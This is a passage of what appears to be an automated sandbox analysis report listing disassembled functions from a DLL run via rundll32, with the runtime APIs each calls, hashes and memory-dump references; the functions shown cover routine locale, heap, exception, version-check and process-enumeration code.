Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 06a468cf4ea3146c72a3bfe8c562305fd041b4786ec8fc43a2ef4a9b8869e669
Instruction ID: 642cefc20efa415f93412f2101acdd772027e8a9f661178c74e2d1f7b96a1e77
Opcode Fuzzy Hash: 06a468cf4ea3146c72a3bfe8c562305fd041b4786ec8fc43a2ef4a9b8869e669
Instruction Fuzzy Hash: D521AE21B1DD4286EB1CCF19D4B08B93370FB84794B5946B2DA7E936E8CE6CE491C600

Function 00007FFDFA8D0ED0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8D0F11
std::_Locinfo::_Locinfo.LIBCPMT ref: 00007FFDFA8D0F45
std::_Locinfo::_Gettnames.LIBCPMT ref: 00007FFDFA8D0F68
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FFDFA8D0F8E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_
String ID:
API String ID: 3485598858-0
Opcode ID: 2a9b343986eb85bb184e78c06407f79c2207cbe7e0602b90f33806a9c49ed246
Instruction ID: a01c2ee1657199b8f69cc1f22496986cbaf8dcbc4b8215b0088d5afd2035aeba
Opcode Fuzzy Hash: 2a9b343986eb85bb184e78c06407f79c2207cbe7e0602b90f33806a9c49ed246
Instruction Fuzzy Hash: 0B219A32B19B8585EB28CB11E4607AD63B0FB84BA4F908271CAAD877D9CF7CD555C780

Function 00007FFDFA8BAAD4 Relevance: 6.0, APIs: 4, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFDFA8BAB02
Process32FirstW.KERNEL32 ref: 00007FFDFA8BAB33
CloseHandle.KERNEL32 ref: 00007FFDFA8BAB65

Part of subcall function 00007FFDFA97903C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA979059

Process32NextW.KERNEL32 ref: 00007FFDFA8BAB56

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_invalid_parameter_noinfo
String ID:
API String ID: 3629628435-0
Opcode ID: cd9187147b2f2547116fb4f291f7b7b3bbd1939c2cba34f143e57aa36d216492
Instruction ID: bfac60b990748b6c122161467338391fa99c59e845f6f6d7d29ba1d4f977c649
Opcode Fuzzy Hash: cd9187147b2f2547116fb4f291f7b7b3bbd1939c2cba34f143e57aa36d216492
Instruction Fuzzy Hash: 66117F2671C642C2E728CB11E4A466AA3A1FB88BD0F948275DDBD877DCCF3CD5468B00

Function 00007FFDFA8DCC08 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8DCC42
std::_Locinfo::_Locinfo.LIBCPMT ref: 00007FFDFA8DCC76
_Getctype.LIBCPMT ref: 00007FFDFA8DCC8E
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FFDFA8DCCAA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Locinfostd::_$GetctypeLocinfo::_Locinfo::~_
String ID:
API String ID: 1079120975-0
Opcode ID: 244b4eb7217d789c5b0e0e9f73e9e74cd9999aa4827be606eeed7de6d6d8013c
Instruction ID: dcdab1a86628b49605e6e9052445e3fe7ec2042515469dfdbeb0588393002d5f
Opcode Fuzzy Hash: 244b4eb7217d789c5b0e0e9f73e9e74cd9999aa4827be606eeed7de6d6d8013c
Instruction Fuzzy Hash: E7218B62B19B8181EB288B24E4607A97360FB94794F408371DBAC836D9DF78E596C340

Function 00007FFDFA906DCC Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 00007FFDFA906E1E
VerSetConditionMask.KERNEL32 ref: 00007FFDFA906E2D
VerSetConditionMask.KERNEL32 ref: 00007FFDFA906E3C
VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA906E5A

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
Instruction ID: f28b06d8beb4be90de1433d80fa647b737c1de498b19879a034d43fea39842ac
Opcode Fuzzy Hash: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
Instruction Fuzzy Hash: 7B114232704B4186D728CF61E8917EAB3A0FB88B48F445139EA9D8B75CDF3CD5498B40

Function 00007FFDFA8CE5B8 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FFDFA8CE5CC

Part of subcall function 00007FFDFA94B560: new.LIBCMT ref: 00007FFDFA94B577

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CE5ED
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CE618
_Yarn.LIBCPMT ref: 00007FFDFA8CE647

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$LocimpLocimp::_Lockit::_Lockit::~_New_Yarnstd::locale::_
String ID:
API String ID: 812427713-0
Opcode ID: caf50532c32ef717258779221a756cb0115e7f42b0b7ca6b566d2c223f9fa28d
Instruction ID: 79ced8dbcb016512f51adaa2f4894e9b647209bc4f2d4f41d9ee8fcab28c850a
Opcode Fuzzy Hash: caf50532c32ef717258779221a756cb0115e7f42b0b7ca6b566d2c223f9fa28d
Instruction Fuzzy Hash: 4A118631B18A4681EB19CF15E4A0A7573B0EF88BC8F444072DA2E876DDCF6CE485C741

Function 00007FFDFA8FA5D4 Relevance: 6.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8FA5F8
SysAllocString.OLEAUT32 ref: 00007FFDFA8FA619
_com_issue_error.COMSUPP ref: 00007FFDFA8FA631
_com_issue_error.COMSUPP ref: 00007FFDFA8FA646

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _com_issue_error$AllocString
String ID:
API String ID: 245909816-0
Opcode ID: e74cf469dc85f394b47f514ccd54f436e10c864d82574a882470a2a725005481
Instruction ID: 09a79fa424874fa8fc90cd5f00903c1a75387ca7e25c5f379311f6fb5524b4eb
Opcode Fuzzy Hash: e74cf469dc85f394b47f514ccd54f436e10c864d82574a882470a2a725005481
Instruction Fuzzy Hash: CB018836B19B8382EB185F55A420729A2A4AF44BA4F548274DF7C0BBD9DF7DDC518700

Function 00007FFDFA918760 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FFDFA918809), ref: 00007FFDFA918777
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FFDFA918809), ref: 00007FFDFA918788
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA9187A0
throw_exception.LIBCPMT ref: 00007FFDFA9187A9

Part of subcall function 00007FFDFA8EC8D0: enable_error_info.LIBCPMT ref: 00007FFDFA8EC8EA
Part of subcall function 00007FFDFA8EC8D0: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8EC909
Part of subcall function 00007FFDFA8EC8D0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FFDFA8DDA0C), ref: 00007FFDFA8EC927
Part of subcall function 00007FFDFA8EC8D0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FFDFA8DDA0C), ref: 00007FFDFA8EC938
Part of subcall function 00007FFDFA8EC8D0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8EC950
Part of subcall function 00007FFDFA8EC8D0: throw_exception.LIBCPMT ref: 00007FFDFA8EC959

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Heap$AllocProcessstd::bad_alloc::bad_allocthrow_exception$ExceptionThrowenable_error_info
String ID:
API String ID: 2554138254-0
Opcode ID: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
Instruction ID: 8fdb5039c15e3599f4e6570a5d896a659081e82af0d54e5db78f911271ef1886
Opcode Fuzzy Hash: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
Instruction Fuzzy Hash: B7017122B09B8181E7149F65B91056963A0FB997E4F989334DABD437DAEF7CE1E0C700

Function 00007FFDFA8B08B4 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8B08F0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8B0913

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8B0919

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 3870983325-0
Opcode ID: f9936f2a0857f2fbdec8d18418d16b7647ac4059551ea173756eb80569e786f2
Instruction ID: 3211cc82cce5a9c77f265612e90c4c2c06337eee55b48921052485cda83331cc
Opcode Fuzzy Hash: f9936f2a0857f2fbdec8d18418d16b7647ac4059551ea173756eb80569e786f2
Instruction Fuzzy Hash: 1DF09020F2A10B58FF2CA3668475B7D11745F447F0FA08FB6DA3E467D9EE5CAA414280

Function 00007FFDFA8EC910 Relevance: 6.0, APIs: 4, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FFDFA8DDA0C), ref: 00007FFDFA8EC927
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FFDFA8DDA0C), ref: 00007FFDFA8EC938
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8EC950
throw_exception.LIBCPMT ref: 00007FFDFA8EC959

Part of subcall function 00007FFDFA8EC8D0: enable_error_info.LIBCPMT ref: 00007FFDFA8EC8EA
Part of subcall function 00007FFDFA8EC8D0: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8EC909

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Heap$AllocExceptionProcessThrowenable_error_infostd::bad_alloc::bad_allocthrow_exception
String ID:
API String ID: 567531190-0
Opcode ID: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
Instruction ID: 53de2c8797b2e60b4aaebd3882d9c5b0431cc02f9d16336f9667832422e5be2f
Opcode Fuzzy Hash: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
Instruction Fuzzy Hash: 77F01232B09B8281EB549F65F85091963A4BB88BE0F544274DABD437D9EF7CD560C740

Function 00007FFDFA8D78A4 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 437COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8C5270: std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C5290
Part of subcall function 00007FFDFA8C5270: std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C52B5
Part of subcall function 00007FFDFA8C5270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C52DF
Part of subcall function 00007FFDFA8C5270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C5394

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FFDFA8D7F43

Part of subcall function 00007FFDFA94CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FFDFA94CA35

Strings

c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FFDFA8D78B0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_std::ios_base::_$Ios_base_dtorTidy
String ID: c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h
API String ID: 2444127305-3002699068
Opcode ID: d97cf1512998f5d14113c21b7c9b57ab198c327359e3f0f8c54e859de5982b09
Instruction ID: dd93b197d5ab5c2662472d90d3dfb6756795fade3190b20abd28386ec0653528
Opcode Fuzzy Hash: d97cf1512998f5d14113c21b7c9b57ab198c327359e3f0f8c54e859de5982b09
Instruction Fuzzy Hash: 3B128A22718A8286DF18DF25D8A06AD7761FB84BC8F948272DF6E477A9DF78D105C340

Function 00007FFDFA8B2F60 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00007FFDFA8B31AB

Part of subcall function 00007FFDFA94B360: std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA94B381
Part of subcall function 00007FFDFA94B360: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FFDFA94B395
Part of subcall function 00007FFDFA94B360: std::locale::_Setgloballocale.LIBCPMT ref: 00007FFDFA94B3A0
Part of subcall function 00007FFDFA94B360: _Yarn.LIBCPMT ref: 00007FFDFA94B3B7
Part of subcall function 00007FFDFA94B360: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA94B404

Strings

const, xrefs: 00007FFDFA8B3014
class, xrefs: 00007FFDFA8B2FA4

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::locale::_$Lockitstd::_$InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
String ID: class$const
API String ID: 1505618351-3992238299
Opcode ID: 077769d3d74be5159f8e822e4a8e227bcb4aecee7d6722e43b7620cf39bae425
Instruction ID: 422147b807705e77f77acc8e8cc8dac68524a5eef095e33fbff0d4d4fc926f86
Opcode Fuzzy Hash: 077769d3d74be5159f8e822e4a8e227bcb4aecee7d6722e43b7620cf39bae425
Instruction Fuzzy Hash: CC81D222F29A4681EB18DB65D4209BC2361EB04BC4F814573EA6E07BDDDFBCE556C380

Function 00007FFDFA97AF88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA97AFC0
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA97B207

Strings

*, xrefs: 00007FFDFA97B0CF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
